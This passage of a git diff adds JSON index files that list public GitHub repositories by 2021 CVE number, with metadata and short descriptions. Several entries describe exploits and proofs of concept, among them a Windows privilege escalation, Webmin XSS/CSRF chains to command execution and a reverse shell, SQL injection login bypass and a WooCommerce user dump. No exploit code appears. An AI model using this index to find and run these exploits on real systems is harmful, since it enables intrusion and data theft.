+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62646606?v=4",
+ "html_url": "https:\/\/github.com\/Y3A"
+ },
+ "html_url": "https:\/\/github.com\/Y3A\/CVE-2021-31956",
+ "description": "Win10 20H2 LPE for CVE-2021-31956",
+ "fork": false,
+ "created_at": "2022-09-02T10:35:11Z",
+ "updated_at": "2024-05-18T18:32:10Z",
+ "pushed_at": "2022-09-02T10:40:04Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 649472205,
+ "name": "CVE-2021-31956-POC",
+ "full_name": "hoangprod\/CVE-2021-31956-POC",
+ "owner": {
+ "login": "hoangprod",
+ "id": 41701929,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41701929?v=4",
+ "html_url": "https:\/\/github.com\/hoangprod"
+ },
+ "html_url": "https:\/\/github.com\/hoangprod\/CVE-2021-31956-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-05T00:03:10Z",
+ "updated_at": "2024-05-18T18:32:08Z",
+ "pushed_at": "2023-06-05T14:20:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32099.json b/2021/CVE-2021-32099.json
new file mode 100644
index 0000000000..d9ffcb726b
--- /dev/null
+++ b/2021/CVE-2021-32099.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 446732690,
+ "name": "CVE-2021-32099",
+ "full_name": "zjicmDarkWing\/CVE-2021-32099",
+ "owner": {
+ "login": "zjicmDarkWing",
+ "id": 8244926,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8244926?v=4",
+ "html_url": "https:\/\/github.com\/zjicmDarkWing"
+ },
+ "html_url": "https:\/\/github.com\/zjicmDarkWing\/CVE-2021-32099",
+ "description": "Just for HTB",
+ "fork": false,
+ "created_at": "2022-01-11T08:14:06Z",
+ "updated_at": "2023-09-28T11:34:57Z",
+ "pushed_at": "2022-01-11T08:15:09Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 447197307,
+ "name": "CVE-2021-32099",
+ "full_name": "ibnuuby\/CVE-2021-32099",
+ "owner": {
+ "login": "ibnuuby",
+ "id": 28418984,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28418984?v=4",
+ "html_url": "https:\/\/github.com\/ibnuuby"
+ },
+ "html_url": "https:\/\/github.com\/ibnuuby\/CVE-2021-32099",
+ "description": "CVE-2021-32099",
+ "fork": false,
+ "created_at": "2022-01-12T11:48:34Z",
+ "updated_at": "2023-08-04T05:22:54Z",
+ "pushed_at": "2022-01-12T11:49:20Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 450330045,
+ "name": "CVE-2021-32099_SQLi",
+ "full_name": "l3eol3eo\/CVE-2021-32099_SQLi",
+ "owner": {
+ "login": "l3eol3eo",
+ "id": 58173707,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58173707?v=4",
+ "html_url": "https:\/\/github.com\/l3eol3eo"
+ },
+ "html_url": "https:\/\/github.com\/l3eol3eo\/CVE-2021-32099_SQLi",
+ "description": "CVE-2021-32099 SQL Injection allow attacker bypass login. From HTB with love",
+ "fork": false,
+ "created_at": "2022-01-21T02:43:20Z",
+ "updated_at": "2022-09-21T09:52:37Z",
+ "pushed_at": "2022-01-21T08:00:59Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 466400226,
+ "name": "CVE-2021-32099",
+ "full_name": "akr3ch\/CVE-2021-32099",
+ "owner": {
+ "login": "akr3ch",
+ "id": 97300177,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97300177?v=4",
+ "html_url": "https:\/\/github.com\/akr3ch"
+ },
+ "html_url": "https:\/\/github.com\/akr3ch\/CVE-2021-32099",
+ "description": "CVE-2021-32099",
+ "fork": false,
+ "created_at": "2022-03-05T08:53:45Z",
+ "updated_at": "2023-10-10T13:30:30Z",
+ "pushed_at": "2022-03-05T09:01:55Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32156.json b/2021/CVE-2021-32156.json
new file mode 100644
index 0000000000..bd59caa804
--- /dev/null
+++ b/2021/CVE-2021-32156.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 361284441,
+ "name": "CVE-2021-32156",
+ "full_name": "Mesh3l911\/CVE-2021-32156",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32156",
+ "description": "Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's Scheduled Cron Jobs feature",
+ "fork": false,
+ "created_at": "2021-04-24T23:02:45Z",
+ "updated_at": "2022-04-06T22:11:24Z",
+ "pushed_at": "2021-04-26T01:46:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32157.json b/2021/CVE-2021-32157.json
new file mode 100644
index 0000000000..169a18b8a0
--- /dev/null
+++ b/2021/CVE-2021-32157.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 361309279,
+ "name": "CVE-2021-32157",
+ "full_name": "Mesh3l911\/CVE-2021-32157",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32157",
+ "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Remote Command Execution (RCE) through the Webmin's Scheduled Cron Jobs feature",
+ "fork": false,
+ "created_at": "2021-04-25T02:08:34Z",
+ "updated_at": "2022-04-06T22:12:02Z",
+ "pushed_at": "2021-04-26T01:46:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 485596660,
+ "name": "CVE-2021-32157",
+ "full_name": "dnr6419\/CVE-2021-32157",
+ "owner": {
+ "login": "dnr6419",
+ "id": 43310843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4",
+ "html_url": "https:\/\/github.com\/dnr6419"
+ },
+ "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-32157",
+ "description": "Make it possible to build a vulnerable webmin virtual environment as a container using docker",
+ "fork": false,
+ "created_at": "2022-04-26T01:49:11Z",
+ "updated_at": "2022-04-26T06:43:32Z",
+ "pushed_at": "2022-04-26T02:03:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32158.json b/2021/CVE-2021-32158.json
new file mode 100644
index 0000000000..3b941c65f0
--- /dev/null
+++ b/2021/CVE-2021-32158.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 361584351,
+ "name": "CVE-2021-32158",
+ "full_name": "Mesh3l911\/CVE-2021-32158",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32158",
+ "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Command Injection through the Webmin's Upload and Download feature",
+ "fork": false,
+ "created_at": "2021-04-26T01:42:19Z",
+ "updated_at": "2022-04-06T22:13:09Z",
+ "pushed_at": "2021-04-26T01:44:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32159.json b/2021/CVE-2021-32159.json
new file mode 100644
index 0000000000..f5e2869ddc
--- /dev/null
+++ b/2021/CVE-2021-32159.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 361580646,
+ "name": "CVE-2021-32159",
+ "full_name": "Mesh3l911\/CVE-2021-32159",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32159",
+ "description": "Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injetion through the Webmin's Upload and Download feature",
+ "fork": false,
+ "created_at": "2021-04-26T01:23:16Z",
+ "updated_at": "2022-04-06T22:14:14Z",
+ "pushed_at": "2021-04-26T01:45:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32160.json b/2021/CVE-2021-32160.json
new file mode 100644
index 0000000000..187f3e094c
--- /dev/null
+++ b/2021/CVE-2021-32160.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 361281776,
+ "name": "CVE-2021-32160",
+ "full_name": "Mesh3l911\/CVE-2021-32160",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32160",
+ "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to create a privileged user through the Webmin's add users feature then getting a reverse shell through the Webmin's running process feature",
+ "fork": false,
+ "created_at": "2021-04-24T22:42:28Z",
+ "updated_at": "2022-04-06T22:15:57Z",
+ "pushed_at": "2021-04-26T01:46:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32161.json b/2021/CVE-2021-32161.json
new file mode 100644
index 0000000000..8971eddc84
--- /dev/null
+++ b/2021/CVE-2021-32161.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 361587735,
+ "name": "CVE-2021-32161",
+ "full_name": "Mesh3l911\/CVE-2021-32161",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32161",
+ "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Command Injection through the Webmin's File Manager feature ",
+ "fork": false,
+ "created_at": "2021-04-26T01:59:44Z",
+ "updated_at": "2022-04-06T22:16:54Z",
+ "pushed_at": "2021-04-26T02:00:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32162.json b/2021/CVE-2021-32162.json
new file mode 100644
index 0000000000..65d472c4ae
--- /dev/null
+++ b/2021/CVE-2021-32162.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 361589905,
+ "name": "CVE-2021-32162",
+ "full_name": "Mesh3l911\/CVE-2021-32162",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-32162",
+ "description": "Exploiting a Cross-site request forgery (CSRF) attack to get a Command Injection through the Webmin's File Manager feature",
+ "fork": false,
+ "created_at": "2021-04-26T02:10:43Z",
+ "updated_at": "2022-04-09T20:58:11Z",
+ "pushed_at": "2021-04-26T02:17:06Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3229.json b/2021/CVE-2021-3229.json
new file mode 100644
index 0000000000..4e13d613e1
--- /dev/null
+++ b/2021/CVE-2021-3229.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 336803155,
+ "name": "CVE-2021-3229",
+ "full_name": "fullbbadda1208\/CVE-2021-3229",
+ "owner": {
+ "login": "fullbbadda1208",
+ "id": 67869836,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67869836?v=4",
+ "html_url": "https:\/\/github.com\/fullbbadda1208"
+ },
+ "html_url": "https:\/\/github.com\/fullbbadda1208\/CVE-2021-3229",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-07T14:12:27Z",
+ "updated_at": "2022-07-22T04:11:52Z",
+ "pushed_at": "2021-02-07T14:18:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32305.json b/2021/CVE-2021-32305.json
new file mode 100644
index 0000000000..cf598209ff
--- /dev/null
+++ b/2021/CVE-2021-32305.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 607007482,
+ "name": "CVE-2021-32305",
+ "full_name": "sz-guanx\/CVE-2021-32305",
+ "owner": {
+ "login": "sz-guanx",
+ "id": 93511367,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93511367?v=4",
+ "html_url": "https:\/\/github.com\/sz-guanx"
+ },
+ "html_url": "https:\/\/github.com\/sz-guanx\/CVE-2021-32305",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-27T05:38:27Z",
+ "updated_at": "2023-02-27T05:38:27Z",
+ "pushed_at": "2023-02-27T05:38:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 736041344,
+ "name": "CVE-2021-32305-websvn-2.6.0",
+ "full_name": "FredBrave\/CVE-2021-32305-websvn-2.6.0",
+ "owner": {
+ "login": "FredBrave",
+ "id": 114189847,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114189847?v=4",
+ "html_url": "https:\/\/github.com\/FredBrave"
+ },
+ "html_url": "https:\/\/github.com\/FredBrave\/CVE-2021-32305-websvn-2.6.0",
+ "description": "This is a exploit of CVE-2021-32305 a web vulnerability to command injection on search.php path, this exploit allows execute commands.",
+ "fork": false,
+ "created_at": "2023-12-26T20:20:00Z",
+ "updated_at": "2023-12-26T20:29:35Z",
+ "pushed_at": "2023-12-26T20:29:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32399.json b/2021/CVE-2021-32399.json
new file mode 100644
index 0000000000..4b8343686d
--- /dev/null
+++ b/2021/CVE-2021-32399.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 476675393,
+ "name": "linux-4.19.72_CVE-2021-32399",
+ "full_name": "nanopathi\/linux-4.19.72_CVE-2021-32399",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/linux-4.19.72_CVE-2021-32399",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-01T10:29:20Z",
+ "updated_at": "2022-04-01T10:37:11Z",
+ "pushed_at": "2022-12-09T13:39:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32471.json b/2021/CVE-2021-32471.json
new file mode 100644
index 0000000000..32c8868193
--- /dev/null
+++ b/2021/CVE-2021-32471.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 331595207,
+ "name": "turing-machine",
+ "full_name": "intrinsic-propensity\/turing-machine",
+ "owner": {
+ "login": "intrinsic-propensity",
+ "id": 77781776,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77781776?v=4",
+ "html_url": "https:\/\/github.com\/intrinsic-propensity"
+ },
+ "html_url": "https:\/\/github.com\/intrinsic-propensity\/turing-machine",
+ "description": "A Python program implementing and exploiting the Minsky Turing machine considered in the paper \"Intrinsic Propensity for Vulnerability in Computers? Arbitrary Code Execution in the Universal Turing Machine\" as per CVE-2021-32471 (https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-32471)",
+ "fork": false,
+ "created_at": "2021-01-21T10:39:42Z",
+ "updated_at": "2024-06-11T12:12:08Z",
+ "pushed_at": "2022-03-28T05:19:18Z",
+ "stargazers_count": 75,
+ "watchers_count": 75,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "arbitrary-code-execution",
+ "minsky",
+ "turing-machine",
+ "universal-turing-machine",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 75,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32537.json b/2021/CVE-2021-32537.json
new file mode 100644
index 0000000000..617bc78271
--- /dev/null
+++ b/2021/CVE-2021-32537.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 375408417,
+ "name": "CVE-2021-32537",
+ "full_name": "0vercl0k\/CVE-2021-32537",
+ "owner": {
+ "login": "0vercl0k",
+ "id": 1476421,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4",
+ "html_url": "https:\/\/github.com\/0vercl0k"
+ },
+ "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2021-32537",
+ "description": "PoC for CVE-2021-32537: an out-of-bounds memory access that leads to pool corruption in the Windows kernel.",
+ "fork": false,
+ "created_at": "2021-06-09T15:44:00Z",
+ "updated_at": "2024-01-04T16:58:29Z",
+ "pushed_at": "2021-06-26T18:31:23Z",
+ "stargazers_count": 58,
+ "watchers_count": 58,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-32537",
+ "pool-corruption",
+ "realtek-driver",
+ "rtkvhd64",
+ "tvn-202106002"
+ ],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 58,
+ "score": 0,
+ "subscribers_count": 6
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32644.json b/2021/CVE-2021-32644.json
new file mode 100644
index 0000000000..ef0571e4bf
--- /dev/null
+++ b/2021/CVE-2021-32644.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 395855471,
+ "name": "CVE-2021-32644",
+ "full_name": "dnr6419\/CVE-2021-32644",
+ "owner": {
+ "login": "dnr6419",
+ "id": 43310843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4",
+ "html_url": "https:\/\/github.com\/dnr6419"
+ },
+ "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-32644",
+ "description": "Ampache XSS ",
+ "fork": false,
+ "created_at": "2021-08-14T01:50:32Z",
+ "updated_at": "2021-11-03T06:08:02Z",
+ "pushed_at": "2021-11-03T06:07:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32648.json b/2021/CVE-2021-32648.json
new file mode 100644
index 0000000000..8b2562b921
--- /dev/null
+++ b/2021/CVE-2021-32648.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 448021889,
+ "name": "CVE-2021-32648",
+ "full_name": "Immersive-Labs-Sec\/CVE-2021-32648",
+ "owner": {
+ "login": "Immersive-Labs-Sec",
+ "id": 79456607,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4",
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec"
+ },
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/CVE-2021-32648",
+ "description": "Proof Of Concept code for OctoberCMS Auth Bypass CVE-2021-32648",
+ "fork": false,
+ "created_at": "2022-01-14T15:50:11Z",
+ "updated_at": "2024-06-26T04:28:08Z",
+ "pushed_at": "2022-01-14T16:03:50Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 450032325,
+ "name": "CVE-2021-32648",
+ "full_name": "daftspunk\/CVE-2021-32648",
+ "owner": {
+ "login": "daftspunk",
+ "id": 1392869,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1392869?v=4",
+ "html_url": "https:\/\/github.com\/daftspunk"
+ },
+ "html_url": "https:\/\/github.com\/daftspunk\/CVE-2021-32648",
+ "description": "Patch your code for October CMS Auth Bypass CVE-2021-32648",
+ "fork": false,
+ "created_at": "2022-01-20T09:28:13Z",
+ "updated_at": "2022-01-20T09:30:12Z",
+ "pushed_at": "2022-01-20T11:10:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32682.json b/2021/CVE-2021-32682.json
new file mode 100644
index 0000000000..6fa34dff04
--- /dev/null
+++ b/2021/CVE-2021-32682.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717130219,
+ "name": "CVE-2021-32682",
+ "full_name": "nickswink\/CVE-2021-32682",
+ "owner": {
+ "login": "nickswink",
+ "id": 57839593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57839593?v=4",
+ "html_url": "https:\/\/github.com\/nickswink"
+ },
+ "html_url": "https:\/\/github.com\/nickswink\/CVE-2021-32682",
+ "description": "elFinder Commands Injection (CVE-2021-32682)",
+ "fork": false,
+ "created_at": "2023-11-10T16:16:47Z",
+ "updated_at": "2023-11-10T16:27:59Z",
+ "pushed_at": "2023-11-10T16:28:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32724.json b/2021/CVE-2021-32724.json
new file mode 100644
index 0000000000..171c699013
--- /dev/null
+++ b/2021/CVE-2021-32724.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 434583285,
+ "name": "CVE-2021-32724-Target",
+ "full_name": "MaximeSchlegel\/CVE-2021-32724-Target",
+ "owner": {
+ "login": "MaximeSchlegel",
+ "id": 45755920,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45755920?v=4",
+ "html_url": "https:\/\/github.com\/MaximeSchlegel"
+ },
+ "html_url": "https:\/\/github.com\/MaximeSchlegel\/CVE-2021-32724-Target",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-03T12:09:46Z",
+ "updated_at": "2021-12-08T16:08:05Z",
+ "pushed_at": "2021-12-08T16:08:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-32789.json b/2021/CVE-2021-32789.json
new file mode 100644
index 0000000000..4e5a4a09b5
--- /dev/null
+++ b/2021/CVE-2021-32789.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 603184920,
+ "name": "CVE-2021-32789",
+ "full_name": "and0x00\/CVE-2021-32789",
+ "owner": {
+ "login": "and0x00",
+ "id": 90927438,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90927438?v=4",
+ "html_url": "https:\/\/github.com\/and0x00"
+ },
+ "html_url": "https:\/\/github.com\/and0x00\/CVE-2021-32789",
+ "description": "💣 Wordpress WooCommerce users dump exploit.",
+ "fork": false,
+ "created_at": "2023-02-17T19:51:24Z",
+ "updated_at": "2024-04-29T15:45:01Z",
+ "pushed_at": "2023-02-17T20:06:52Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 754784767,
+ "name": "CVE-2021-32789",
+ "full_name": "DonVorrin\/CVE-2021-32789",
+ "owner": {
+ "login": "DonVorrin",
+ "id": 113451397,
